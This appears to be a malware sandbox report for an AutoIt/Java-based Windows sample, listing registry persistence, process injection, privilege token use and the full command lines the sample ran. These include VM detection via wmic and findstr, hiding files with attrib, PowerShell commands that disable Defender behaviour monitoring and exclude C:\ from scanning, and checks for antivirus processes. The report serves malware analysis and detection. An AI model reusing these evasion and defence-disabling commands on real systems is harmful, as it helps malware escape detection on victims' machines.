Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\abbkkce = "\"C:\\eegeaeg\\AutoIt3.exe\" C:\\eegeaeg\\abbkkce.a3x" C:\Users\Admin\AppData\Local\acetiam\AutoIt3.exe N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4840 set thread context of 4520 N/A C:\Users\Admin\AppData\Local\acetiam\AutoIt3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\acetiam\AutoIt3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\231.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-3D6R0.tmp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-N8KO8.tmp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-R63LS.tmp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\acetiam\AutoIt3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\acetiam\AutoIt3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\acetiam\AutoIt3.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3736 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.exe C:\Users\Admin\AppData\Local\Temp\is-N8KO8.tmp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.tmp
PID 3736 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.exe C:\Users\Admin\AppData\Local\Temp\is-N8KO8.tmp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.tmp
PID 3736 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.exe C:\Users\Admin\AppData\Local\Temp\is-N8KO8.tmp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.tmp
PID 2292 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\is-N8KO8.tmp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.tmp C:\Windows\system32\cmd.exe
PID 2292 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\is-N8KO8.tmp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.tmp C:\Windows\system32\cmd.exe
PID 3360 wrote to memory of 1764 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3360 wrote to memory of 1764 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3360 wrote to memory of 4868 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 3360 wrote to memory of 4868 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 2292 wrote to memory of 4940 N/A C:\Users\Admin\AppData\Local\Temp\is-N8KO8.tmp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.tmp C:\Windows\system32\cmd.exe
PID 2292 wrote to memory of 4940 N/A C:\Users\Admin\AppData\Local\Temp\is-N8KO8.tmp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.tmp C:\Windows\system32\cmd.exe
PID 4940 wrote to memory of 3312 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4940 wrote to memory of 3312 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4940 wrote to memory of 4576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4940 wrote to memory of 4576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4576 wrote to memory of 5076 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tar.exe
PID 4576 wrote to memory of 5076 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tar.exe
PID 4940 wrote to memory of 452 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4940 wrote to memory of 452 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4940 wrote to memory of 3092 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\231.exe
PID 4940 wrote to memory of 3092 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\231.exe
PID 4940 wrote to memory of 3092 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\231.exe
PID 3092 wrote to memory of 3432 N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\231.exe C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe
PID 3092 wrote to memory of 3432 N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\231.exe C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe
PID 3092 wrote to memory of 3432 N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\231.exe C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe
PID 3432 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
PID 3432 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
PID 3432 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
PID 3432 wrote to memory of 4844 N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
PID 3432 wrote to memory of 4844 N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
PID 3432 wrote to memory of 4844 N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
PID 4844 wrote to memory of 1908 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4844 wrote to memory of 1908 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4844 wrote to memory of 1908 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3120 wrote to memory of 4448 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3120 wrote to memory of 4448 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3120 wrote to memory of 4448 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3432 wrote to memory of 404 N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe C:\Windows\SysWOW64\explorer.exe
PID 3432 wrote to memory of 404 N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe C:\Windows\SysWOW64\explorer.exe
PID 3432 wrote to memory of 404 N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe C:\Windows\SysWOW64\explorer.exe
PID 4552 wrote to memory of 1080 N/A C:\Windows\explorer.exe C:\Users\Admin\AppData\Local\Temp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.exe
PID 4552 wrote to memory of 1080 N/A C:\Windows\explorer.exe C:\Users\Admin\AppData\Local\Temp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.exe
PID 4552 wrote to memory of 1080 N/A C:\Windows\explorer.exe C:\Users\Admin\AppData\Local\Temp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.exe
PID 1080 wrote to memory of 1180 N/A C:\Users\Admin\AppData\Local\Temp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.exe C:\Users\Admin\AppData\Local\Temp\is-R63LS.tmp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.tmp
PID 1080 wrote to memory of 1180 N/A C:\Users\Admin\AppData\Local\Temp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.exe C:\Users\Admin\AppData\Local\Temp\is-R63LS.tmp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.tmp
PID 1080 wrote to memory of 1180 N/A C:\Users\Admin\AppData\Local\Temp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.exe C:\Users\Admin\AppData\Local\Temp\is-R63LS.tmp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.tmp
PID 1180 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\is-R63LS.tmp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.tmp C:\Users\Admin\AppData\Local\Temp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.exe
PID 1180 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\is-R63LS.tmp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.tmp C:\Users\Admin\AppData\Local\Temp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.exe
PID 1180 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\is-R63LS.tmp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.tmp C:\Users\Admin\AppData\Local\Temp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.exe
PID 1036 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Local\Temp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.exe C:\Users\Admin\AppData\Local\Temp\is-3D6R0.tmp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.tmp
PID 1036 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Local\Temp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.exe C:\Users\Admin\AppData\Local\Temp\is-3D6R0.tmp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.tmp
PID 1036 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Local\Temp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.exe C:\Users\Admin\AppData\Local\Temp\is-3D6R0.tmp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.tmp
PID 2392 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\is-3D6R0.tmp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.tmp C:\Windows\system32\cmd.exe
PID 2392 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\is-3D6R0.tmp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.tmp C:\Windows\system32\cmd.exe
PID 3436 wrote to memory of 1708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3436 wrote to memory of 1708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3436 wrote to memory of 4420 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 3436 wrote to memory of 4420 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 2392 wrote to memory of 4216 N/A C:\Users\Admin\AppData\Local\Temp\is-3D6R0.tmp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.tmp C:\Windows\system32\cmd.exe
PID 2392 wrote to memory of 4216 N/A C:\Users\Admin\AppData\Local\Temp\is-3D6R0.tmp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.tmp C:\Windows\system32\cmd.exe
PID 4216 wrote to memory of 2128 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4216 wrote to memory of 2128 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4216 wrote to memory of 3948 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 4216 wrote to memory of 3948 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.exe

"C:\Users\Admin\AppData\Local\Temp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.exe"

C:\Users\Admin\AppData\Local\Temp\is-N8KO8.tmp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.tmp

"C:\Users\Admin\AppData\Local\Temp\is-N8KO8.tmp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.tmp" /SL5="$50272,4595545,205824,C:\Users\Admin\AppData\Local\Temp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" cmd /c wmic diskdrive get model | FINDSTR /I "Virtual VBOX VMware">ds.txt

C:\Windows\System32\Wbem\WMIC.exe

wmic diskdrive get model

C:\Windows\system32\findstr.exe

FINDSTR /I "Virtual VBOX VMware"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" cmd /c interim.cmd

C:\Windows\system32\attrib.exe

attrib +s +h /D "C:\Users\Admin\AppData\Local\Temp\msdtadmin\*.*"

C:\Windows\system32\cmd.exe

cmd /c tar xf interim

C:\Windows\system32\tar.exe

tar xf interim

C:\Windows\system32\attrib.exe

attrib +s +h /D "C:\Users\Admin\AppData\Local\Temp\msdtadmin\*.*"

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\231.exe

".\231\231.exe"

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe

"C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\activation.jar;lib\asm-all.jar;lib\commons-email.jar;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\gson.jar;lib\jfoenix.jar;lib\jkeymaster.jar;lib\jna.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-desktop-hotkey-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-gui-jfoenix-ext.jar;lib\jphp-json-ext.jar;lib\jphp-jsoup-ext.jar;lib\jphp-mail-ext.jar;lib\jphp-runtime.jar;lib\jphp-systemtray-ext.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\jsoup.jar;lib\mail.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe

Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command "Add-MpPreference -Force -ExclusionPath "C:\""' -Verb RunAs}"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe

Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command "Set-MpPreference -Force -DisableBehaviorMonitoring "' -Verb RunAs}"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableBehaviorMonitoring

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -Force -ExclusionPath C:"

C:\Windows\SysWOW64\explorer.exe

explorer C:\Users\Admin\AppData\Local\Temp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding

C:\Users\Admin\AppData\Local\Temp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.exe

"C:\Users\Admin\AppData\Local\Temp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.exe"

C:\Users\Admin\AppData\Local\Temp\is-R63LS.tmp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.tmp

"C:\Users\Admin\AppData\Local\Temp\is-R63LS.tmp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.tmp" /SL5="$80272,10740751,812544,C:\Users\Admin\AppData\Local\Temp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.exe"

C:\Users\Admin\AppData\Local\Temp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.exe

"C:\Users\Admin\AppData\Local\Temp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.exe" /VERYSILENT /NORESTART

C:\Users\Admin\AppData\Local\Temp\is-3D6R0.tmp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.tmp

"C:\Users\Admin\AppData\Local\Temp\is-3D6R0.tmp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.tmp" /SL5="$90272,10740751,812544,C:\Users\Admin\AppData\Local\Temp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.exe" /VERYSILENT /NORESTART

C:\Windows\system32\cmd.exe

"cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH

C:\Windows\system32\find.exe

find /I "wrsa.exe"

C:\Windows\system32\cmd.exe

"cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH

C:\Windows\system32\find.exe

find /I "opssvc.exe"

C:\Windows\system32\cmd.exe

"cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH

C:\Windows\system32\find.exe

find /I "avastui.exe"

C:\Windows\system32\cmd.exe

"cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH

C:\Windows\system32\find.exe

find /I "avgui.exe"

C:\Windows\system32\cmd.exe

"cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH

C:\Windows\system32\find.exe

find /I "nswscsvc.exe"

C:\Windows\system32\cmd.exe

"cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH

C:\Windows\system32\find.exe

find /I "sophoshealth.exe"

C:\Users\Admin\AppData\Local\acetiam\AutoIt3.exe

